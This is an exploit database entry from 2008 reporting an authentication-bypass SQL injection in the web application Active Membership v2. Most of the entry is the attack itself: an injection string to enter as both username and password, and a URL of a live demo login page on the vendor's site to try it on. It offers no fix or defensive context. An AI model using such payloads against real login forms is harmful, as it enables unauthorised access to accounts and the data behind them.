Active Membership v 2 (Auth Bypass) Remote SQL Injection Vulnerability

2008-11-29T00:00:00
ID 1337DAY-ID-4300
Type zdt
Reporter R3d-D3v!L
Modified 2008-11-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Active Membership v 2 (Auth Bypass) Remote SQL Injection Vulnerability
======================================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.activewebsoftwares.com
   
 [~]Software: Active Membership v 2
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  username: r0' or ' 1=1--
  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivemembership/account.asp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2018-01-11]  #